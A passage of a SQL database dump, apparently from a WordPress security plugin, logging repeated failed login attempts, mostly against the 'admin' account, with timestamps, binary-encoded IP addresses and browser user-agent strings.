Safari/537.36'),(4651,6167,1628981358.374081,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(4652,6168,1628982654.196470,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���2��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(4653,6169,1628983176.310141,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���=�M','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4654,6169,1628983176.832046,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���=�M','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4655,6170,1628983939.908741,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��:��^','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4656,6170,1628983939.968166,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��:��^','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4657,6171,1628985232.504732,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(4658,6172,1628985277.287013,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4659,6173,1628986144.788004,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��?���','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0'),(4660,6174,1628986523.929463,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(4661,6175,1628987429.937692,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����N','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4662,6176,1628987826.675780,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4663,6177,1628989135.186664,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(4664,6178,1628989573.334044,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ݹ\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4665,6179,1628991758.480403,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���捫','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(4666,6180,1628991806.334485,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��O���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4667,6181,1628993068.393636,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P�Ҕ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(4668,6182,1628995683.235115,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo6','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(4669,6183,1628996300.133736,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4670,6184,1628998236.059458,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ћ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4671,6185,1628998258.722526,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_S�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(4672,6186,1628998920.296877,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�-:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0'),(4673,6187,1628999457.705665,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��l���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(4674,6188,1629000133.925706,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N�(�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4675,6189,1629000621.558728,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(4676,6190,1629001739.003283,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ٮ�i','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(4677,6191,1629001883.037992,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�X)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4678,6192,1629002840.174605,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^x�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(4679,6193,1629003681.860112,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���7+3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4680,6194,1629003944.103316,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4\Z','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4681,6195,1629005523.488361,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4682,6196,1629006167.142054,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��:��^','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(4683,6197,1629007283.292742,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���I�-','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(4684,6198,1629007359.424991,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q٤','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4685,6199,1629009216.648677,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4686,6200,1629009539.086903,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��x','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(4687,6201,1629010682.564027,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3M�\"','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(4688,6202,1629011102.312822,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4689,6203,1629011834.481300,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���2��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(4690,6204,1629012015.009145,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�;�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(4691,6205,1629012974.712580,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ghIo','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(4692,6206,1629012984.936408,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gC�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4693,6207,1629014116.514600,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��9','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(4694,6208,1629014207.719654,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��?���','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(4695,6209,1629014964.752796,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/4�*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4696,6210,1629015267.917121,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(4697,6211,1629016919.182432,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G?/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4698,6212,1629018862.220509,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4699,6213,1629020960.107309,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4700,6214,1629021006.183681,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3Kȷ','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(4701,6215,1629023006.135748,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4702,6216,1629023313.356126,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��R�,�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(4703,6217,1629024470.533262,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����B','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(4704,6218,1629025039.527304,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��pNH','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4705,6219,1629025621.840749,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4706,6220,1629027157.619189,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4707,6221,1629027591.196024,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�?�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),(4708,6222,1629027934.483010,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(4709,6223,1629028707.792175,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��Ǩf�','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36'),(4710,6224,1629029091.998649,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���2��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(4711,6225,1629029228.906420,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P��o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4712,6226,1629031302.426947,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A�M','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4713,6227,1629033446.642161,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���}z/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4714,6228,1629034408.796654,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gZ��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(4715,6229,1629036755.305801,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����^�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(4716,6230,1629041989.127906,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�0�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),(4717,6231,1629048735.921954,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�0�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4'),(4718,6232,1629053743.740784,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�S','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(4719,6233,1629054403.765959,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�.6','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(4720,6234,1629056874.316888,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν2�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(4721,6235,1629063125.963264,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(4722,6236,1629064618.655133,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��E�','Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0'),(4723,6236,1629064618.690966,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��E�','Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0'),(4724,6237,1629066261.943358,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"P�R','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(4725,6238,1629066631.142327,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0���6�M','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4726,6239,1629069394.559470,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��l���','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(4727,6240,1629072538.030000,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vҳ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(4728,6241,1629075684.203422,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(4729,6242,1629076059.812054,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��Eţ�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0'),(4730,6243,1629081983.761025,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��r!Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(4731,6244,1629084973.965267,1,'loginFailInvalidUsername','wordcamp',0,'\0\0\0\0\0\0\0\0\0\0���>�','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(4732,6245,1629085136.139586,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"C��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(4733,6246,1629086134.435065,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�4�','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(4734,6247,1629087005.419479,1,'loginFailInvalidUsername','adminlin',0,'\0\0\0\0\0\0\0\0\0\0���>�','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(4735,6248,1629087095.107553,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�n','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4736,6249,1629087103.778734,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�n','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4737,6250,1629087105.894517,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�n','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4738,6251,1629087440.252485,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4739,6252,1629087450.311065,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4740,6253,1629087456.429951,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4741,6254,1629087480.762732,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4742,6255,1629087488.518931,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4743,6256,1629087491.635875,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4744,6257,1629087495.454957,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4745,6258,1629087520.072133,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4746,6259,1629087533.756654,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4747,6260,1629087536.269207,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4748,6261,1629087539.117931,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4749,6262,1629087551.247016,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4750,6263,1629087560.261460,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4751,6264,1629087567.107423,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4752,6265,1629087568.936346,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4753,6266,1629087571.517500,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4754,6267,1629087576.689003,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4755,6268,1629087586.292363,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4756,6269,1629087592.094953,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4757,6272,1629088299.596623,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����s�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(4758,6272,1629088299.657146,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����s�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(4759,6273,1629094413.669048,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QEˣ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(4760,6274,1629097397.717077,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�%','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(4761,6275,1629100171.380913,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4762,6276,1629100415.080601,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]sO','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(4763,6277,1629101306.402337,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4764,6278,1629102419.742096,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��E��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4765,6279,1629103449.981080,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4766,6279,1629103450.072783,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4767,6280,1629103553.225694,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���hƼ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 